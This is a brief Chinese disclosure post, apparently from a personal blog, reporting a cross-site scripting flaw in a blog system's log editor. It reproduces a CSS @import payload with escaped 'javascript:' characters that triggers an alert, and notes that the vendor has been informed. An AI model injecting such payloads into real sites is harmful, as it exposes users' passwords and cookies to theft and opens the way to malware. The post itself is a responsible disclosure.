[[wiki]wiki[/wiki]][/wiki]作者:茄子宝
来源:茄子乱语
直接用日志显示[wiki]源代码[/wiki]方式[wiki]编辑[/wiki]写入
XSS
<P><STRONG>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
</STRONG></P>
此处脚本漏洞存在有一定的风险,可能导致挂马,威胁到用户,密码,COOKIE等敏感[wiki]信息[/wiki],已通知官方处理等待更新[wiki]程序[/wiki].
